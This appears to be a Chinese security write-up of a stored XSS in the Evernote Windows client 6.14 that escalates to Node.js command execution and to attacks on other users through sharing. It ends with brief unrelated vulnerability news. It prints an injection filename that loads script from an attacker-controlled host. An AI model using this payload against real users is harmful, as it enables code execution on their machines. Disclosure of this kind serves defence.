一 漏洞简介
1.1.印象笔记
印象笔记支持所有的主流平台系统,一处编辑,全平台之间可以同步。同时,印象笔记支持web版和移动网页版,
只要能上网的设备均可以在浏览器中打开进行操作。
1.2.漏洞情况
二 漏洞详情
2.1.印象笔记 Windows 客户端 6.14 储存型 XSS 漏洞
@sebao
发现的储存型 XSS 漏洞的触发方式如下:
1. 在笔记中添加一张图片
2. 右键并将该图片更名为" onclick="alert(1)">.jpg"
3. 双击打开该笔记并点击图片,成功弹框。
经过测试,印象笔记官方修复该 XSS 的方式为:在更名处过滤了 >
、<
、"
等特殊字符,但有意思的是我在 6.14 版本下测试
的 XSS 在 6.15 版本中依旧可以弹框,这也就意味着:官方只修了 XSS 的入口,在 XSS 的输出位置,依旧是没有任何过滤的。
2.2 演示模式下的 Nodejs 代码注入
在 6.14 版本的客户端中将一张图片更名为 " onclick="alert(1)"><script src="http://172.16.4.1:8000/1.js">.jpg
后,
将客户端升级为最新版 6.15。
遍历 C:\\Program Files(x86)\Evernote\Evernote\
目录下的所有文件。
我发现印象笔记在C:\\Program Files(x86)\Evernote\Evernote\NodeWebKit
目录下存在 NodeWebKit
,
在演示的时候,印象笔记会调用这个NodeWebKit
。可以通过之前发现的储存型 XSS 在 NodeWebKit
中执行 Nodejs
代码。
2.3本地文件读取和远程命令执行的实现
既然可以注入 Nodejs
代码,那就意味着可以尝试使用 child_process
来执行任意命令。
尝试使用 require('child_process').exec
,但是却报错了: Module name "child_process" has not been loaded yet for context
。
How we exploited a remote code execution vulnerability in math.js
根据文中的内容,简单的修改读取本地文件的 payload 很快就实现了相应的功能:
从 window.process.env
中获取到 env
的内容,并使用 spawn_sync
成功地弹出了计算器。
2.4通过分享功能攻击其他用户
在注册了一个小号后,尝试使用分享功能将 恶意笔记
分享给 ”他人“。
我的小号将会在 工作空间
收到别人发来的消息。
小号尝试演示这个笔记,被注入的 Nodejs
代码成功执行!
2020年09月17日,IBM发布安全公告,WebSphere Application Server中存在一个安全漏洞,该漏洞是由于WebSphere Application Server在处理XML数据时容易受到XML外部实体注入(XXE)攻击。
2020年9月22日,FastAdmin远程代码执行漏洞细节曝光,黑客登录前台会员中心,即可远程GetShell,风险极大。
2020年9月17日,VMware发布安全公告,在Spring Framework版本5.2.0-5.2.8、5.1.0-5.1.17、5.0.0-5.0.18、4.3.0-4.3.28和较旧的不受支持的版本中,发现了一个存在于Spring Framework中的反射型文件下载(Reflected File Download,RFD)漏洞(CVE-2020-5421)。
获取安全动态